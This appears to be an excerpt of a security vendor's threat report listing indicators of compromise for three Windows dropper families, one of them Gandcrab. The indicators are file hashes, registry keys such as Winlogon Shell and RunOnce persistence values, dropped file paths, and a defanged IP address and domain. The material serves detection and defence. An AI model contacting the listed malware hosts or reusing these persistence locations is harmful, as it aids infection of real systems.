9cdd4b4358fb08a04c622e3bf8e825cb87a703249973136279e20045bcfecf00
d4bee61d84fa1a7724e2425f8296619575ef7131448708d9939fa69ec574b197
c2f06095fab6aee3aa19d6c30dca75e926fc01abcd21a74f2d50fa2a8804ec59
72e5d84c4c66c1b180443d1f54fb6cd874fb4cddd9572f6daba90fba02e9e1ea
f835993c01842ca78326ac5816c64a90381e8fe804c0ef38d2329c39340ea16d
a8425ab94da9ca3f5dc7e3e7d125ccef26ef1cfbeffa06f9be0992c6402d919e
013e0f21218183e916f5eea20c7d1b2c0d391b19c7b7bcee4a1e5540c0f9048a
5a77aa50590e70924a869a0a74aae5f4172e0d383f1490453553a05e2dac0244
e735ccd69bd3f87773641b54a959cdfe660994c192ca768083c7fbc8e43b084d
1658bccda90ea8ecae77dcfa4e62629c269f8497b8bdd3caf53c314ac62e8264
8d5dbba983ff17ba948863dee51cf989ceea7ac9154dfdee77f0e0f3641530b8
abc2f0170a32507c0229181a010fbee77af068234da4ffb7573970e190eeb4c4
2a956f95d05aacf75be964cfae884cb2b4a7540e8f5314e41aade641f09a0d22
3909dd2aedae70911ba19b7124e30a74e9c81bb3da4f6f95f8340dbff95dd3c4
bd97233242fa610fd53b7d4ce308f55c8c6b0653aca021f7be02c2ca830d30bb
d8c8f1f779ed9f089e33405c30c04021b17fa6ee5d1f679e958bd1894db2c692

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Prepscram-6571863-0

Indicators of Compromise

Registry Keys

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION

Value: PnpInstanceID

Mutexes

IP Addresses

52[.]85[.]146[.]150

Domain Names

bush[.]basinafterthought[.]bid

Files and or directories created

File Hashes

14a27e53d748dd5a180f31283a24c420e0cf201f7deaf77140c9e07954fbc7e1
e5946260399e55af6a5e21a696c3790e7aaf6653869b73885ab7b93116dff677
71e6dc866c630348249bad46b5d34036a576a108b8b69f36984f4195882a02e5
a1d8ff6306950d4a55402737a42f613a0eccc5fce66c7aa0a60d11c2ca598525
f91c4b1034ea7a193aef5ce586a1f6ba84e735b55bef91d9f4559816b40c3321
eb732a01f5f2a3fda038a10ce62a0f1d3068aaaed4ee2b44f351007f4c063a7d
ed114bd563038ca504de06b1a0629c493d886d6419205da69eb9730f82688050
faefcf1da92c7c554dfef22e4f719f73517ae636af0b47b319635239af6657d4
e7010999238fd3cc2cc144b4ba09e0affc6362811cd76d27dd55848b266f6388
fbc0a54ab9d6e1317867d478f765c4648ee0c3f156a4aaf29d851fa20b48d61f
f7d7d01c4812ba9cf1fa71958dd395b120ae9a420437767b4ff9aec2455d0447
e47008ae92769ad08f74ef5ff7b6f97b0b018479adff00a5041b02adb71f3bf8
d7fe56e6ce270a796adb2d14db0d2d4c7b02845737fa1973c6f790eefc3260ac
5c1d23211ee3e6fe222ad1e017aa56f00cdfb64678f1ffb457489e70dbbfa511
bad3de4948f6a8c08555cd0224713fa7dac6c5845548ee4148cc486a6cd49adf
afce18cdd76a0e3e36dd2d9639fa1ba4f616952c1cc69e1d06089155d773a947
01b2027c7a7e3888eb84a0e7c3bacf95b9b6e8da7a79bc578464ec9627f7a9e0
bc879aed2577aa152064a167e312287d59575d510f7a56eda7aa66e170baae80
f4eef29cd1e43843cfc1d0533d2c518dbbb5982093d6d1c6f576e02549e28b60
42691432711dfe36fcb46fbf93395e41bcb7afc7c6b57bf7295471dbf1928e9a
4431eebcb86a10222171eb6b678ae19bd59aef22644a842681469dbd2ab85e4c
3bc6b0ea5ea71bbb67be5d06fb4d6bc7f5398f11bf2802bd381a645033e45922
6ff6df3020263a78db2719e427e037264873559522b49506b7532fb72c8ceec1
6fd913f9e1684e763628aa1faab9b414688f62692db53b3d6edcdb041a598445
98a1804a57bb382d7b68128f282c8186046e8d7ffa71f7a955cdeb16ad1c8239

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Scar-6563211-0

Indicators of Compromise

Registry Keys

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON

Value: Shell

<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY

Value: AddToFavoritesInitialSelection

<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY

Value: AddToFeedsInitialSelection

<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

Mutexes

IP Addresses

Domain Names

Files and or directories created

%UserProfile%\kxyk.exe
%SystemDrive%\TEMP\papi.dmp

File Hashes

819b64dbecbfaa4274e096740c033bd118391e000124c42028a5dadff6a2b6b2
10f4d71c51b53e87fb855f85cb2066c0611786b4f27bf030a969e2b696e0ac84
55a2c8b5e5528bfd05136b3759ac2ff967145706f88dc331c92bf2e65e3c2053
b4e421f1af2fa82aa5c1489dea77cefc69125e16631fe19d6e4d30329186dba3
48464c8b5d71fe2689065e051e16275e8eda04fe502991d84840c662d4ce19da
c9a1facd73f2d0d3ef0f86c6069a1deae2e35d2a010ca9a4953e32d749d59936
e61ad12a6bc35d1cfe82665168eed4083b13693fe7512826f3740367edbfa52b
b76762ebb156f1cceaa5d76c880cded3d8e2ed577ba45aaf1459c2a2b1b6a287
ad0500c90ba5cad4e4bad229f8ea18f97bb6e61112b2770804d8d9171fd5e812
a8aef06b777086b2de7c77fc1c9c4a41f876116d96141799be4a600e3a6b5881
2e933578bb4d9e9e76617f593ebd51b6e5bc91773da879c7a56a0e982539ad98
604f529ae774f625bdd0a35ecea90256793d70e14dc04c9ca1fb9197122e8cd6
3d49eda19ce2fd612a516b677511b193b43e27f4e21d0d979d3be02db8846fc8
9599162f12785563da8afc8e119a671e0e7c499579c83d6bf8f614328761b282
3bbc0ca58b107ffebc14d3cc8a9dc21583b5d8e9bec257e057c2549dc9b4ab5d
77f20318e906d4347194b2bbb0ac957e375577653aad2b2bab20b40f0c5f0f26
36058bac712a7a5a72aa4b30d5d473cda298c66028d2fa42628a0a44fa0d9775
6d33fb8cc44e1e33b2dfcd4e315c510a47dec57a0835d93504803f8623c0605e
a7801a51c772e4768bb745626b7649891eb33b132f8882ae61726a9abf885e55
de9d7b3c017d241d4fe483025d2e6c35377384c50bcc01cb8f49ab5a38f9263e
1572f8b9f6e2a23e1e1acec696112271ec3e1516471989a8ff640f40a1c304ff
61ec6a1beec7fb5386f11692f06179960d26e8367b241d9e5609dbe043d30763
718e8a1114f6a6c5e0ba5c52cf2c17fa1ec9486497acb1253ee868beacceb4fc
4772ecd2c9b219dacd5614c5ad9ad5f6c92253bd36e318a61c8ea2b42c9d0421
8047b535f1a3c1eb1cfb02e66746d0d70dabd2a973e0edfd4525305e40b9737a

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Gandcrab-6574655-0

Indicators of Compromise

Registry Keys

<HKU>\.DEFAULT\CONTROL PANEL\DESKTOP\MUICACHED

Value: MachinePreferredUILanguages

<HKU>\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3E\52C64B7E

Value: @ieframe.dll,-12512

<HKU>\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3E\52C64B7E

Value: LanguageList

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{00021493-0000-0000-C000-000000000046}\ENUM

Value: Implementing

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyServer

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: AutoDetect

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyOverride

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyEnable

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: AutoConfigURL

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

Value: CleanShutdown

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyServer

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: AutoDetect

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyOverride

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyEnable

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: AutoConfigURL

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS

Value: SavedLegacySettings

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS

Value: DefaultConnectionSettings

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: DisplayName

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: URL

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: Deleted

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: SuggestionsURL

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: TopResultURL

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: FaviconURL

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: SuggestionsURLFallback

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: FaviconURLFallback

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

Value: TopResultURLFallback

<HKCU>\CONTROL PANEL\KEYBOARD

Value: InitialKeyboardIndicators

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\VERSIONMANAGER

Value: FirstCheckForUpdateHighDateTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\VERSIONMANAGER

Value: FirstCheckForUpdateLowDateTime

<HKU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SUGGESTED SITES

Value: DataStreamEnabledState

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SUGGESTED SITES

Value: MigrationTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}

Value: CompatBlockPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}

Value: NewInstallPromptCount

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON

Value: ShutdownFlags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\IEXPLORE

Value: Count

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\IEXPLORE

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\IEXPLORE

Value: Blocked

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\IEXPLORE

Value: Type

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\IEXPLORE

Value: Time

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT

Value: CachePrefix

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES\{00021494-0000-0000-C000-000000000046}\ENUM

Value: Implementing

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\HIVELIST

Value: \Registry\User\S-1-5-21-2580483871-590521980-3826313501-500

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\HIVELIST

Value: \Registry\User\S-1-5-21-2580483871-590521980-3826313501-500_Classes

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: UNCAsIntranet

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: AutoDetect

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: IntranetName

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RELIABILITY\SHUTDOWN

Value: Comment

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RELIABILITY\SHUTDOWN

Value: ReasonCode

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\USER PREFERENCES

Value: 88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\USER PREFERENCES

Value: 2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: UNCAsIntranet

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: AutoDetect

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: IntranetName

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE

Value: bxchnkordot

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: IntranetName

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000004

Value: ObjectLru

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000004

Value: ObjectId

<HKU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000001

Value: ObjectLru

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\0000000000000001

Value: ObjectId

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

Value: 3000000010875

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS

Value: SavedLegacySettings

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS

Value: DefaultConnectionSettings

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\RECOVERY\ADMINACTIVE

Value: {50743781-67B4-11E8-8419-00501E3AE7B5}

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\RECOVERY\ADMINACTIVE

Value: {00000000-0000-0000-0000-000000000000}

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RELIABILITY

Value: LastAliveStamp

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RELIABILITY

Value: 6005BT

<HKLM>\SOFTWARE\MICROSOFT\WBEM\CIMOM

Value: ProcessID

<HKLM>\SOFTWARE\MICROSOFT\WBEM\CIMOM

Value: LastServiceStart

<HKLM>\SOFTWARE\MICROSOFT\WBEM\CIMOM

Value: PreviousServiceShutdown

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\RECOVERY\PENDINGRECOVERY

Value: AdminActive

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}

Value: WpadDetectedUrl

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}

Value: WpadDecisionTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}

Value: WpadDecision

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}

Value: WpadNetworkName

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\{CFFE6C1B-C698-4A68-B86B-DD768F696445}

Value: WpadDecisionReason

<HKCU>\SOFTWARE\MICROSOFT\CTF\MSUTB

Value: Top

<HKCU>\SOFTWARE\MICROSOFT\CTF\MSUTB

Value: Left

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SETUP

Value: UrlHistoryMigrationTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SETUP

Value: HaveCreatedQuickLaunchItems

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES64\{00021494-0000-0000-C000-000000000046}\ENUM

Value: Implementing

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\WINDOWSSEARCH

Value: Version

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}

Value: CompatBlockPromptCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}

Value: NewInstallPromptCount

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000067F9

Value: 1

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\IEXPLORE

Value: Count

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\IEXPLORE

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\IEXPLORE

Value: Blocked

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\IEXPLORE

Value: Type

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\IEXPLORE

Value: Time

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpNetbiosOptions

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}

Value: DhcpNameServerList

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\3000000010875

Value: 2

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS

Value: DhcpDomain

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS

Value: DhcpNameServer

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS

Value: SoHRequest

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\0A-64-3C-54-A8-18

Value: WpadDetectedUrl

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\0A-64-3C-54-A8-18

Value: WpadDecisionTime

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\0A-64-3C-54-A8-18

Value: WpadDecision

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\WPAD\0A-64-3C-54-A8-18

Value: WpadDecisionReason

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\STORAGE

Value: HotplugSecurityDescriptor

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\STORAGE

Value: Deny_Execute

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINMGMT\PARAMETERS

Value: ServiceDllUnloadOnStop

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP

Value: ChangeNotice

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\IEXPLORE

Value: Count

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\IEXPLORE

Value: Flags

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\IEXPLORE

Value: Blocked

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\IEXPLORE

Value: Type

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\IEXPLORE

Value: Time

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PROFILELIST\S-1-5-21-2580483871-590521980-3826313501-500

Value: RunLogonScriptSync

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PROFILELIST\S-1-5-21-2580483871-590521980-3826313501-500

Value: RefCount

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES

Value: SecuritySafe

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION

Value: PnpInstanceID

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES

Value: CachePrefix

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: _FileId_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: _ObjectLru_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: _Usn_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: _ObjectId_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: AeFileID

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: _UsnJournalId_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\2

Value: AeProgramID

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: _FileId_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: _ObjectLru_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: _Usn_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: _ObjectId_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: AeFileID

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: _UsnJournalId_

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1

Value: AeProgramID

<A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\1\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}

Value: 10000000067F9

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\AUTHENTICATION\LOGONUI\LOGONSOUNDPLAYED

Value: LogonUIChecked

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP

Value: Collection

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC

Value: IsTabletPC

<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\TABLET PC

Value: DeviceKind

<HKLM>\SYSTEM\CONTROLSET001\CONTROL\WDI\CONFIG

Value: ServerName

<HKU>\.DEFAULT\CONTROL PANEL\DESKTOP

Value: Wallpaper

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\DISCARDABLE\POSTSETUP\COMPONENT CATEGORIES64\{00021493-0000-0000-C000-000000000046}\ENUM

Value: Implementing

<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TRAYNOTIFY

Value: PastIconsStream

<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TRAYNOTIFY

Value: LastAdvertisement

<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TRAYNOTIFY

Value: UserStartTime

<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TRAYNOTIFY

Value: IconStreams

<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}

Value: NewInstallPromptCount

